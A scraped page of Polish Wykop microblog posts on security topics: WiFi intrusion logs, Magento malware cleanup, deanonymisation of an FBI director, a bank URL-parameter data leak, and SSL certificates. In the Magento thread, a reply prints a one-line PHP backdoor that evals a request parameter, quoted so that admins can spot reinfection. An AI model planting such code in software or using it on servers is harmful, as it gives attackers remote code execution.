Ech, nie ma to jak sprawdzanie w nowym routerze logów... w starym nawet takiej funkcji nie miałem. jJkiś k---s wbił się mi do sieci WiFi... ale mam mało sąsiadów którzy coś takiego umieją zrobić, a w sumie bym powiedział - że nie mam takich sąsiadów... mieszkam na prawie odludziu... a tu zaskoczenie...
No dobra, to czekamy aż się znowu pojawi aby przynajmniej zobaczyć ciut więcej niż MAC (który może być fałszywy, ale wygląda
  • 9
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

Jak zabezpieczyć magentoo przed atakami, bo jakiś malware na serwerze się pojawił. Do tej pory zmieniłem uprawnienia, usunąłem syf, folder /downloader i wgrałem patche bezpieczeństwa. Czy tyle wystarczy?

#security #magento
  • 10
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

@prezydent_wykopu: wystarczy, że w jednym pliku php zostało np:

php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eѵal(stripslashes($_REQUEST[$post_var])); exit(); }; ?
I już masz problem, bo ten plik wywoła agresor z odpowiednimi parametrami i zainfekuje serwer na nowo... niestety przerabiałem.
Są różne wariacje tego (z if'ami, wiele spacji aby ukryć, i naprawdę dużo dodatkowych opcji, tylko dla POST, lub tylko dla GET), polecam przeszukać wszystkie pliki php pod względem słowa "eval" i
  • Odpowiedz
Dyrektor FBI chciał ukryć się w internecie, ale popełnił błąd i został zdeanonimizowany. Oto klilka wskazówek jak namierzać "tajne" profile w mediach społecznościowych. Jeśli macie jakieś swoje fejk-konto (albo multi ( ͡° ͜ʖ ͡°)), weźcie sobie te rady do serca.

https://niebezpiecznik.pl/post/jak-dyrektor-fbi-zostal-zdeanonimizowany-przez-dziennikarke-kilkoma-prostymi-trickami/

#niebezpiecznik #security #bezpieczenstwo #prywatnosc #inwigilacja #instagram #twitter i taki troche pseudo #hacking
  • 6
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

Wiadomości TVP popłynęły w komentarzu do afery KNF - i to srogo.

http://www.wykop.pl/link/3678489/jak-wiadomosci-tvp-oklamuja-widzow-w-sprawie-afery-knf/

#bezpieczenstwo #security

PS. Jesteśmy parę lat na Wykopie ale najwyraźniej nie uważaliśmy na lekcjach, bo dalej trudno nam zrozumieć, dlaczego chyba solidnie udokumentowane kłamstwo jest zakopywane jako "informacja nieprawdziwa". Chyba lepiej nie będziemy się zbyt długo nad tym zastanawiać :)
  • 2
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

Mirktzy, wie ktoś coś więcej o FreeSSL od Symanteca?

Czy to faktycznie będzie darmowe? Bo na dole same triale ale możliwe że chcą żeby ten darmowy SSL przyciągał ruch i liczą na 'dosprzedaż' tych pozostałych rozwiazań.

Wiem że afera była u nich ostatnio ale nadal jednak Symantec wydaje mi się wiarygodniejszy niż Let's Encrypt :F

Co
Saeglopur - Mirktzy, wie ktoś coś więcej o FreeSSL od Symanteca?

Czy to faktycznie...

źródło: comment_LKWc394KuGPkwua15pN3kqX3Bv2zO4vW.jpg

Pobierz
  • 5
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

  • 8
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

@niebezpiecznik-pl: generalnie Idea Bank ma problem ze starym systemem (były przypadki lokat dostępnych w starym systemie, które według tabeli oprocentowania nie istniały, np tu w komentarzach). Z nowy zresztą też - interfejs Clouda jest tragiczny i samo załadowanie trwa wieki (o ile nie rzuci 500tką). Migracja ze starego do nowego powinna być dawno zakończona a, jak widać, ciągle trwa... od kilku lat :)

PS. Swoją drogą zdarza się też
Blackall - @niebezpiecznik-pl: generalnie Idea Bank ma problem ze starym systemem (by...

źródło: comment_R7sARWJy7JQ7psE8UYcWVhoxLSJyXN47.jpg

Pobierz
  • Odpowiedz
Znalazł dziurę w banku Millennium, która pozwalała kraść dane innych klientów. Zgłosił i usłyszał: ale nie wolno zmieniać parametrów w URL! :D O tym co było dalej, w artykule:

https://niebezpiecznik.pl/post/bank-millenium-mial-blad-umozliwiajacy-pobieranie-polis-z-danymi-osobowymi-innych-klientow/

#millennium #banki #security #hacking #bezpieczenstwo #niebezpiecznik
  • 13
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach